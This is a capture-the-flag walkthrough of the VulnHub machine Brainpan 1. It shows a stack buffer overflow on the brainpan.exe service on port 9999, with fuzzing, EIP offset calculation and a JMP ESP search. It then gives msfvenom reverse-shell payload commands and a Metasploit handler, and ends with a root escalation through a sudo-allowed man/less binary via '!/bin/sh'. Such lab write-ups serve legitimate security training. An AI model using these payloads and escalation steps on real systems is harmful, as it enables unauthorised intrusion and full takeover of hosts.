BRAINPAN: 1 Vuln Hub Machine Walkthrough

Brainpan 1 vuln hub

This was an intermediate Linux machine that involved exploiting a stack buffer overflow vulnerability to gain an initial foothold and an SUID binary similar to the man command to escalate privileges to root.

Level: Intermediate

Penetrating Methodology:

Network Scanning



  • nmap


  • Browsing HTTP Service
  • Dirsearch


  • Using immunity debugger
  • Use python script

Privilege Escalation

  • Exploiting Sudo rights


Network Scanning:

We downloaded, imported and ran the virtual machine (.ova file) on the virtualbox, the machine will automatically be assigned an IP address from the network DHCP. To begin we will find the IP address of our target machine, for that use the following command as it helps to see all the IP’s in an internal network.

Commands: sudo arp-scan –l

Brainpan1 vuln hub


We used Nmap for port enumeration. We found that ports 9999/tcp for abyss, 10000/tcp for HTTP,SimpleHTTPServer 0.6 (Python 2.7.3)are open.

Brainpan 1 vuln hub


As port 10000 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage.

Enumerating Port: 10000

Brainpan 1 vuln hub

The next step is to run a scan to find hidden files or directories using dirsearch.

Brainpan 1 vuln hub

After navigating the bin directory, the only available file was brainpan.exe. This will cause the application to overflow. Downloading it on the Win7 machine.

Brainpan 1 vuln hub

Enumerating Port: 9999

When interacting with port 9999 with Netcat, it seems to require user input

Brainpan 1 vuln hub

This will be the parameter to overflow.


Crashing the application

First of all we have to cause the application to crash, the very first thing to do is run the vulnerable executable:

Brainpan 1 vuln hub

Creating the initial python fuzzer to find out what amount of bytes will cause the application to crash:

You can download all python script from github from this link;

Starting Immunity Debugger, attaching it to the application and running it:

Brainpan 1 vuln hub

Running the It appears when it reaches 602 bytes it stops working

Brainpan 1 vuln hub

Brainpan 1 vuln hub

The application crashed with an access violation error and EIP was overwritten with the “A” characters sent by the script:

Brainpan 1 vuln hub

Identifying the EIP offset


The next step required is to identify which part of the buffer that is being sent is landing in the EIP register, in order to control the execution flow. Using the msf-pattern_create tool to create a string of 602 bytes.

 Brainpan 1 vuln hub

Adding the new pattern to script.


Restarting the application, re-attaching Immunity and running the script:

Brainpan 1 vuln hub

This time, EIP was overwritten with “35724134”

 Brainpan 1 vuln hub

Using the msf-pattern_offset tool to calculate the exact offset, which is 524

Brainpan 1 vuln hub

Modifying script to override EIP with “B” characters to test this last step using script.

Restarting the application, re-attaching Immunity and running the script:

Brainpan 1 vuln hub

As expected, the EIP registry was overwritten with the four “B” characters that were sent by the script:

Brainpan 1 vuln hub

Testing for bad characters

In this phase all we have to do is identify whether there are any bad characters that can’t be interpreted by the application, so that we can later on remove them from the shellcode.

Modifying the script, adding all possible characters in hex format; This last step using script.

Restarting the application, re-attaching Immunity and running the script:


Brainpan 1 vuln hub

Brainpan 1 vuln hub

Finding valid opcodes for the JMP ESP instruction – we are after FFE4.

Searching for a JMP ESP instruction address using Mona – found 1 pointers

Brainpan 1 vuln hub

Now we can add payload. To make the payload we will use msfvenom.


msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST= -e x86/shikata_ga_nai -b “\x00”

-f py


Brainpan 1 vuln hub


Add the payload in script after the changes.

Keeping your netcat listener on at port 443: Restarting the application without the debugger and running the script,

Brainpan 1 vuln hub

Brainpan 1 vuln hub

We have got our shell !!!!!

Now we are using the linux payload.


msfvenom -p linux/x86/shell/reverse_tcp LPORT=443 LHOST= -e x86/shikata_ga_nai -b “\x00”

-f py

Brainpan 1 vuln hub

Add the payload in script after the changes.

Use metasploit framework.

use multi/handler

set payload linux/x86/shell/reverse

set lhost

set lport 443


Brainpan 1 vuln hub

Restarting the application without the debugger and running the script and use the brainpan ip; port;9999

Brainpan 1 vuln hub


Privilege Escalation:

When running sudo -l to see if there are any commands the current user can execute as root, an /home/anansi/bin/anansi_util binary stands out: Trying to execute it – it looks like this binary can be used to display manual pages of commands i.e. it uses the man command. The man command uses less to display and navigate through the information, which is known to be vulnerable if it is being run as root, as it allows the user to execute commands by typing ! followed by the command

After pressing RETURN, this takes to the man page of the whoami command.

Simply executing !/bin/sh grants root access

Brainpan 1 vuln hub

Finally we capture the flag:

Brainpan 1 vuln hub



Written By

Name : Akash Kumar

Kindly read another articles :

SYMFONOS: 4 Vuln Hub Machine Walkthrough

SYMFONOS: 3.1 Vuln Hub Machine Walkthrough


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